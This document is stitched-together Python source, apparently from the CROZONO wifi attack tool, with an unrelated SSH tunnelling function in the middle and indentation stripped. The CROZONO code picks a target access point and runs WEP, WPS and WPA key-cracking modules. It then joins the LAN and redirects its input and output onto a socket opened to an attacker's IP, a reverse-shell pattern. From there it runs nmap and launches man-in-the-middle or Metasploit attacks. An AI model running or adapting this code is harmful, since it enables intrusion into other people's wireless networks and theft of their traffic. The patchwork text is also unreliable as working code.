if settings.TARGET_ESSID is not None:
if settings.TARGET_KEY is not None:
ap_target = None
lan_mgr.connect_to_lan()
else:
device_mgr.hardware_setup()
ap_target = airodump.scan_targets()
else:
device_mgr.hardware_setup()
ap_target = airodump.scan_targets()
# -------------------- Infiltrate wifi ------------------------------------------------
if ap_target is not None:
settings.TARGET_ESSID = ap_target.get('ESSID').strip()
settings.TARGET_BSSID = ap_target.get('BSSID').strip()
settings.TARGET_CHANNEL = ap_target.get('channel').strip()
settings.TARGET_PRIVACY = ap_target.get('Privacy').strip()
info("Target selected: " + settings.TARGET_ESSID)
if settings.TARGET_PRIVACY == 'WEP':
info("Cracking {e} access point with WEP privacy...".format(
e=settings.TARGET_ESSID))
wep_modules = find_modules('wep')
for wep_module in wep_modules:
attack = import_module(wep_module[0])
if attack.check():
attack.setup()
attack.run()
if settings.TARGET_KEY is not None:
info("Key found!: {k} ".format(k=settings.TARGET_KEY))
lan_mgr.save_key()
lan_mgr.connect_to_lan()
break
else:
pass
if settings.TARGET_KEY is None:
error("Key not found! :-(")
exit(0)
elif settings.TARGET_PRIVACY == 'WPA' or settings.TARGET_PRIVACY == 'WPA2' or settings.TARGET_PRIVACY == 'WPA2 WPA':
info("Cracking {e} access point with {p} privacy...".format(
e=settings.TARGET_ESSID, p=settings.TARGET_PRIVACY))
wps = wash.wash_scan()
if wps:
info("WPS is enabled")
wps_modules = find_modules('wps')
for wps_module in wps_modules:
attack = import_module(wps_module[0])
if attack.check():
attack.setup()
attack.run()
if settings.TARGET_KEY is not None:
info("Key found!: {k} ".format(
k=settings.TARGET_KEY))
break
else:
pass
if settings.TARGET_KEY is None:
if wps:
warn(
"PIN not found! :-( Running WPA/WPA2 attack modules..."
)
wpa_modules = find_modules('wpa')
for wpa_module in wpa_modules:
attack = import_module(wpa_module[0])
if attack.check():
attack.setup()
attack.run()
if settings.TARGET_KEY is not None:
info("Key found!: {k} ".format(
k=settings.TARGET_KEY))
break
else:
pass
if settings.TARGET_KEY is None: # still...
error("Key not found! :-(")
exit(0)
else:
lan_mgr.save_key()
lan_mgr.connect_to_lan()
else:
info("Open network!")
lan_mgr.connect_to_lan()
# -------------------- Acquired LAN range --------------------------------------------
lan_mgr.lan_range()
lan_mgr.get_gateway()
# -------------------- Connect to attacker and relay network info --------------------
if settings.IP_ATTACKER is not None:
info(
"Sending information about network to attacker ({ip}) and running attacks..."
.format(ip=settings.IP_ATTACKER))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((settings.IP_ATTACKER, settings.PORT_ATTACKER))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
banner()
info("Hello! :)")
if settings.LAN_DISCOVERY is not None:
discovery = import_module(settings.LAN_DISCOVERY)
if discovery.check():
discovery.setup()
discovery.run()
else:
warn("Error to run LAN discovery module!")
else:
warn("Attacker not defined! Ending...")
exit(0)
# -------------------- LAN Attacks --------------------------------------------------
if settings.ATTACK is not None:
attack = import_module(settings.ATTACK)
if attack.check():
attack.setup()
attack.run()
else:
error("Error to run LAN attack module! Ending...")
exit(1)
else:
warn("Attack not defined!")
s.shutdown(1)
info("CROZONO has finished! Good bye! ;)")
def main():
global session
global logging
global disconnection_timeout
c = args.config
log.info('Using: {}'.format(os.path.join(os.path.dirname(os.path.abspath(c)), c)))
with open(c) as f:
config = yaml.load(f)
logging = config.get('logging')
tunnels = config.get('tunnels')
all_tunnels = []
[all_tunnels.append(Tunnel(t)) for t in tunnels]
hops = config.get('hops')
for i, hop in enumerate(hops):
pid_stack = []
key = list(hop.keys())[0]
h = hop[key]
hop = Hop(key, h, i)
tunnels = []
if hop.key_auth:
if hop.index == len(hops) - 1:
[tunnels.append(each.mapping) for each in all_tunnels]
else:
for tun in all_tunnels:
tunnels.append(tun.get_localhost_mapping())
p = connect_with_key(hop.host, hop.user, hop.auth, tunnels)
pid_stack.append(p)
else:
if hop.index == len(hops) - 1:
[tunnels.append(each.mapping) for each in all_tunnels]
else:
for tun in all_tunnels:
tunnels.append(tun.get_localhost_mapping())
p = connect_with_password(hop.host, hop.user, hop.auth, tunnels)
pid_stack.append(p)
session.sendline('while [ 1=1 ]; do echo \'keepalive\' ; sleep 3 ; done')
log.info('Tunneling done:')
[log.info(t) for t in all_tunnels]
# TODO: Watch for broken pipe?
try:
input("Press ENTER to disconnect")
print()
except KeyboardInterrupt:
log.error('Getting out of here!')
disconnection_timeout = 0
for h in reversed(hops):
alias = list(h.keys())[0]
log.info("Disconnecting from {}".format(alias))
try:
r = logout(disconnection_timeout)
except KeyboardInterrupt:
log.warn("Hurrying up.")
r = None
disconnection_timeout = 0
if r:
log.info('Disconnected')
else:
log.warn('Connection forcefully closed')
try:
os.kill(pid_stack[0], signal.SIGKILL)
log.warn('Killed off remaining SSH process')
except ProcessLookupError:
pass
log.info('Done')
def main():
banner()
if not checks.check_root():
error('You need root privileges to run CROZONO!\n')
exit(1)
if not checks.check_wlan_attacks_dependencies():
exit(1)
args = parse_args()
info("CROZONO running...")
settings.OS_PATH = os.getcwd()
settings.INTERFACE = args.interface if args.interface is not None else settings.INTERFACE
settings.INTERFACE = device_mgr.get_ifaces()[0] if settings.INTERFACE is None else settings.INTERFACE
settings.TARGET_ESSID = args.essid if args.essid is not None else settings.TARGET_ESSID
settings.TARGET_KEY = args.key if args.key is not None else settings.TARGET_KEY
settings.IP_ATTACKER = args.dest if args.dest is not None else settings.IP_ATTACKER
settings.ATTACK = args.attack if args.attack is not None else settings.ATTACK
if settings.TARGET_ESSID is not None:
if settings.TARGET_KEY is not None:
ap_target = None
lan_mgr.connect_to_lan()
else:
device_mgr.hardware_setup()
ap_target = airodump.scan_targets()
else:
device_mgr.hardware_setup()
ap_target = airodump.scan_targets()
# -------------------- Infiltrate wifi --------------------
if ap_target is not None:
settings.TARGET_ESSID = ap_target.get('ESSID').strip()
settings.TARGET_BSSID = ap_target.get('BSSID').strip()
settings.TARGET_CHANNEL = ap_target.get('channel').strip()
settings.TARGET_PRIVACY = ap_target.get('Privacy').strip()
info("Target selected: " + settings.TARGET_ESSID)
if settings.TARGET_PRIVACY == 'WEP':
from src.attacks import wep_attack
info("Cracking {e} access point with WEP privacy...".format(e=settings.TARGET_ESSID))
wep_attack.run()
if settings.TARGET_KEY is None:
error("Key not found! :(")
exit()
else:
info("Key found!: {k} ".format(k=settings.TARGET_KEY))
lan_mgr.save_key()
lan_mgr.connect_to_lan()
elif settings.TARGET_PRIVACY == 'WPA' or settings.TARGET_PRIVACY == 'WPA2' or settings.TARGET_PRIVACY == 'WPA2 WPA':
from src.attacks import wpa_attack,wps_attack
info("Cracking {e} access point with {p} privacy...".format(e=settings.TARGET_ESSID, p=settings.TARGET_PRIVACY))
wps = wps_attack.check()
if wps:
info("WPS is enabled")
wps_attack.pixiedust()
if settings.TARGET_KEY is None:
warn("PIN not found! Trying with conventional WPA attack...")
wpa_attack.run()
else:
warn("WPS is not enabled")
wpa_attack.run()
if settings.TARGET_KEY is None:
error("Key not found! :(")
exit(1)
else:
info("Key found!: {k} ".format(k=settings.TARGET_KEY))
lan_mgr.save_key()
lan_mgr.connect_to_lan()
else:
info("Open network!")
lan_mgr.connect_to_lan()
# -------------------- Acquired LAN range -----------------------------------------
lan_mgr.lan_range()
lan_mgr.get_gateway()
# -------------------- Connect to attacker and relay NMap info --------------------
if os.path.exists(settings.OS_PATH + '/cr0z0n0_nmap'):
os.remove(settings.OS_PATH + '/cr0z0n0_nmap')
if not checks.check_lan_attacks_dependencies():
exit(1)
if settings.IP_ATTACKER is not None:
info("Sending information about network to attacker ({ip}) and running attacks...".format(ip=settings.IP_ATTACKER))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((settings.IP_ATTACKER, settings.PORT_ATTACKER))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
banner()
info("Hello! :)")
info("Executing Nmap...")
subprocess.call(['nmap', '-O', '-sV', '-oN', 'cr0z0n0_nmap', '--exclude', settings.IP_LAN, settings.LAN_RANGE], stderr=subprocess.DEVNULL)
else:
warn("Attacker not defined! Ending up...")
exit()
# -------------------- Attacks --------------------
if settings.ATTACK == 'sniffing-mitm':
from src.attacks import sniffing_mitm
sniffing_mitm.run()
elif settings.ATTACK == 'metasploit':
from src.attacks import metasploit
metasploit.run()
else:
warn("Attack not defined!")
s.shutdown(1)
info("CROZONO has finished! Good bye! ;)")
